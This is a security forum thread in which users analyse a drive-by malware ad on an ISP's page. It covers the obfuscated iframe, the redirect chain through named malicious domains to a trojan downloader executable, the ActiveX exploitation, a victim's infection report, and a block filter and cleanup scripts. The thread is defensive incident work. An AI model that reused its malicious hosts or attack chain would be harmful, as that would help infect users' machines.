nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
 ·AT&T U-Verse
 ·AT&T Midwest
| reply to nwrickert
Re: Does anyone know anything about this advert?
Here is the iframe definition near the bottom of the eskimo.com page:
Anything obfuscated that way looks suspicious to me.
the content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the javascript (around 23000 bytes). Clearly somebody was hiding something.
I fetched those pages with "wget", so have local copies.
I later tried loading the page in XP with firefox, scripting turned on, but a limited user account. Nothing bad happened. This probably requires IE on an admin account before it can do anything bad.
Yet another reason to use a limited user account, to use firefox, to use the noscript extension.
--
AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13 |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country! | looks like the code in that line directs the user to the aforementiond website's directory: /dl/adv598.php
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... ) |
|
nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
·AT&T U-Verse
·AT&T Midwest
1 edit | yes it does
I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread. That's quicker than trying to do it manually.
I don't currently have a good tool for handling that obfuscated javascript, though. |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
 ·Callcentric
 ·RoadRunner Cable
·AT&T CallVantage
1 edit | I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development?
This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners:Google: reported bad
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... ) |
|
nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL | Not sure.
I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed. Other parts of eskimo.com are listed, but not the one that was used here.
I'm not seeing any warning if I try reloading the original link. |
|
rick752
Premium
join:2006-01-27
New York
1 edit | reply to justin
I just added:
*cdpuvbhfzz.com*
.. to the 'Malicious code' area of the EasyList subscription for Adblock Plus.
That took care of the current malicious 3rd-party frame there. That frame is still present on Eskimo.com.
We'll have to see how this manifests itself again in another instance to try to zero in on it.
--
EasyList, EasyElement, & ABP Tracking Filter Subscriptions for Adblock Plus |
|
LoneWolf
join:2008-01-20 | reply to justin
Another good reason to have an ad blocker.
In my case AdMuncher.
Can't click on what I can't see.  |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
·Callcentric
·RoadRunner Cable
·AT&T CallVantage
| reply to nwrickert
I think I might have loaded Google's link instead - Such a dummy I am!! My GET of the actual link only yielded an apache page .
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... ) |
|
Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC
| reply to justin
Discussions > Troubleshooting & Implementation Questions > Script appears to be running from GoogleADs
(But it is not..see here)
»groups.google.com/group/adsense-···lnk=raot
»forum.coppermine-gallery.net/ind···sg250236
see also
Malicious site? or hacked site?
traffdollars.biz/dl/adv598.php
»spywarehunt.blogspot.com/
--
Gladiator Security Forum »www.gladiator-antivirus.com/
*
A fun/friendly/informative forum for the mature elder crowd
»www.theover50goldengroup.net
|
|
rick752
Premium
join:2006-01-27
New York | Thanx, Name Game ... that was the 2nd verification that I was looking for.
Changing filter in ABP EasyList now.  |
|
Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC
| said by rick752  :Thanx, Name Game ... that was the 2nd verification that I was looking for. Changing filter in ABP EasyList now. What a nasty piece of work that stuff is..good luck Rick. |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
1 edit | reply to rick752
And more here -
»www.google.com/search?q=adv598.php
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... ) |
|
rick752
Premium
join:2006-01-27
New York
1 edit | I think I have this blocked now. Thanx.
That really sucks  |
|
Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC | Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
»forum.coppermine-gallery.net/ind···1.0.html |
|
mysec
Premium
join:2005-11-29
| reply to justin
Using the link nwrickert gives, here is the exploit in action.
As the page loads, the iframe connects in the background to cdpuvbhfzz.com (see IE status bar) and almost immediately an IE error box appears:
____________________________________________________________
Meanwhile adv598.html caches:
____________________________________________________________
As soon as the user clicks to close the IE error box, the IE window closes, a new IE Blank window opens and the obfuscated code attempts to download loadadv598.exe in the background:
____________________________________________________________
The following file also caches, and the CLSID is one of several vulnerable ActiveX exploits
used in the past, but I didn't follow through to check it more.
____________________________________________________________
Conclusion
Lots of fancy footwork attempting to accomplish the same old thing: sneak in a trojan downloader,
easily prevented with proper security.
|
|
TechSponge
join:2001-05-14
Hillside, NJ
| reply to justin
Hey Folks! Im the idiot that clicked on the cool looking Banner. I never click on Banners unless Im on legit sites. Thought that was safe. Guess not.
So...got back to the city to work on this PC to get it running for tomorrow.
Info: I was running spybot s&d fully patched and teatimer running. Spywareblaster installed but not "active". Symantec Corp 10, fully patched.
It created 2 folder in PROGRAM FILES. Netproject & Helper. 3 BHO's were added according to hijackthis. 2 were pointing to ieservicegate(IE Anti-Spyware - {9034a523-d068-4be8-a284-9df278be776e} - »www.ieservicegate.com/redire{...} + Extra button: (no name) - {9034a523-d068-4be8-a284-9df278be776e} - »www.ieservicegate.com/redire{...}) and 1 to netproject (sbmdl.dll).
There were a bunch of items caught by Spybot: Zlob, Smitfraud, Spylocked, win32 renos, and a few others.
As I type this, even though i would say ive done a good job cleaning...i get a few warnings from symantec in my temp ie content files for trojans (mediatubecodec[1].exe) and spybot is blocking...something.
Looks like the wipe begins. Thanks to all for all of your input. All of this is above my head. Im just a simple network guy.
-Sponge |
|
Lanik
Lab-nik
Premium,ExMod 2002-03
join:2001-06-25
Bay Area
| said by TechSponge :Hey Folks! Im the idiot that clicked on the cool looking Banner. Sh!t happens, we've all made that mistake at one point or another. What's more important is how you proceed from there mainly and what lessons were learned during this exercise in patience.
--
"If it ain't broke don't fix it." |
|
TechSponge
join:2001-05-14
Hillside, NJ | reply to justin
BTW - I never got to click on anything on the site...i had the time to visually search for NY and NJ as served areas...and the fireworks just began. |
|
Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC
1 edit | reply to justin
foulu
Contributor
Coppermine frequent
--------------------------------------------------------------------------------
Hi,
I make a php file that can sanitize the addition data from php & html file that infected with iframe things. I create it to use on one of my working site but I think release it will help more people. The script is simple, just check current folder and all sub folder for .php & .html, loop to find infect string in those files and then remove it. Anyway, use it with own will, I will not take any responsibility if you damage your site when using it.
I attach the file with this post, download and rename it to cure.php, upload to your site & run it.
------------------------------------------------------------
cure.txt (2.48 KB - downloaded 81 times.)
http://forum.coppermine-gallery.net/index.php/topic,51671.180.html
also there...
A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one but very simple to use if you have shell access or /bin/sh cgi capabilities.
Use it on your web's root.
------------------------------------------------------------
nettoie_cpg.txt (0.37 KB - downloaded 32 times.)
--
Gladiator Security Forum http://www.gladiator-antivirus.com/
*
A fun/friendly/informative forum for the mature elder crowd
http://www.theover50goldengroup.net
|
|
foxsteve
Premium
join:2001-12-28
Campbell, CA | reply to nwrickert
cdpuvbhfzz.com has address 85.255.121.195
Found 4 websites with the IP 85.255.121.195
1) aarmrgdxrv.com
2) acdedblshd.com
3) adtctqypoa.com
4) xabmiphabh.cn |
|
